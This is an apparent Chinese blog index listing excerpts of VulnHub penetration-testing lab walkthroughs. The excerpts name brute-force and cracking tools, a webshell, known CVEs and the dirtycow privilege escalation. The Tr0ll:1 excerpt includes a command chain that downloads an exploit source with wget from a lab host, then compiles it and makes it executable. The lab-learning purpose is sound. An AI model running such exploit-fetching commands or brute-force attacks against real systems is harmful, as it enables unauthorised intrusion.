m0_52923241的博客

打靶机笔记——常用工具篇POP3：电子邮件协议Hydra：暴力破解工具简介Hydra是一款非常强大的暴力破解工具，它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。目前该工具支持以下协议的爆破：AFP，Cisco AAA，Cisco身份验证，Cisco启用，CVS，Firebird，FTP，HTTP-FORM-GET，HTTP-FORM-POST，HTTP-GET，HTTP-HEAD，HTTP-P

目录kali自带字典目录vim文本编辑器linux通过修改/etc/hosts文件 添加IP地址与域名的映射CVE-2013-3630——Moodle在linux下如何本地开启端口Linux中查看进程状态信息命令：psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer：linux远程下载文件到本地scpftpwgetGCC编译CVE-2016-10033——PHPmailer远程代码执行漏洞111端口rpcbind漏洞python tty：终端控

VulnHub-Tr0ll:2VulnHub-Tr0ll:2渗透思路小知识点一、Linux tail 命令二、SSH补充知识点常用工具一、fcrackzip：zip加密文件破解工具二、unzip：解压缩zip包的工具VulnHub-Tr0ll:2渗透思路第一步依旧是利用nmap扫ip、开放的端口（80、21、22），利用dirb扫目录。查看web页面和ftp搜集信息，找到加密的压缩文件，ftp账号Tr0ll，ftp密码Tr0ll，压缩文件的账号和SHA256私钥小知识点一、Linux tail 命令

VulnHub-IMF: 1VulnHub-IMF: 1渗透思路小知识点一、php中使用url传递数组的方法二、sqlmap用到的参数理解三、文件上传提权四、缓冲区溢出常用工具一、weevely：(Linux菜刀)php webshell的安全测试工具二、ltrace：跟踪进程调用库函数的情况工具VulnHub-IMF: 1渗透思路参考文章：VulnHub-IMF: 1渗透测试详细流程参考文章：VulnHub-IMF: 1渗透测试详细流程渗透思路：第一步，还是nmap扫ip，端口，开放80端口，访

VulnHub-DerpNStink: 1VulnHub-DerpNStink: 1渗透测试详细流程小知识点常用工具VulnHub-DerpNStink: 1渗透测试详细流程小知识点常用工具

VulnHub-Lord Of The Root: 1.0.1VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程小知识点常用工具VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程参考：https://mp.weixin.qq.com/s/RcdNhvbUh9A-ZMdnoULYMQ距离上次打靶机隔好久了，因为一些事情耽搁了。渗透学习之路继续~渗透思路：与前几个一样，显示nmap扫ip、端口，这次开放的只有22端口。通过学习，有一个端口碰撞（

VulnHub-W1R3S: 1VulnHub-W1R3S: 1渗透测试详细流程小知识点必学工具curl：文件传输工具Nikto ：web漏洞扫描神器john开膛手：密码破解工具VulnHub-W1R3S: 1渗透测试详细流程VulnHub-W1R3S: 1渗透测试详细流程这台靶机可能是太简单了吧，打的是相当的顺利，相比之前要好很多，时间主要花费在两个小工具的学习上，这俩工具功能强大，但是以前没有接触过。再练~基本思路：还是跟前几台靶机一样，先信息收集，nmap找ip，查端口，web页面查找有用信

VulnHub-Tr0ll:1VulnHub-Tr0ll:1渗透详细思路小知识点常用工具篇VulnHub-Tr0ll:1渗透详细思路VulnHub-Tr0ll:1渗透详细思路这是我打的第四个靶机，思路比以前清晰很多，一些常用的工具nmap找目标ip，开放端口（21：ftp；22：ssh；80：http），访问web页面寻找有用信息dirb扫目录cd /tmpwget http://192.168.246.129/37292.cgcc 37292.c -o expchmod +x exp.

VulnHub-Raven: 2VulnHub-Raven: 2渗透详细思路小知识点常用工具篇VulnHub-Raven: 2渗透详细思路VulnHub-Raven: 2渗透详细思路nmap找目标ip地址，扫可以试用的开放端口和服务（22、80、111）dirb进行目录的爆破扫描找漏洞，发现PHPMailer 邮件服务searchsploit查看漏洞利用点，下载到本地，修改参数并运行小知识点常用工具篇...

VulnHub-Lampiao渗透VulnHub-Lampiao详细解题步骤知识点总结Linux中查看进程状态信息命令：psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer：linux远程下载文件到本地scpftpwgetGCC编译常用工具篇Dirb：Kali Linux下web网站目录爆破工具cewl：密码攻击工具wget：Linux下载文件的工具VulnHub-Lampiao详细解题步骤VulnHub-Lampiao详细解题步骤nma

VulnHub-GoldenEye-1VulnHub-GoldenEye-1 详细阶梯步骤知识点总结kali自带字典目录vim文本编辑器linux通过修改/etc/hosts文件 添加IP地址与域名的映射Moodle(CVE-2013-3630)在linux下如何本地开启端口常用工具篇POP3：电子邮件协议Hydra：暴力破解工具Netcat：网络测试工具burpsuite-Decoder：编码解码工具SearchSploit漏洞查找工具查看jpg文件底层内容工具VulnHub-GoldenEye-1 详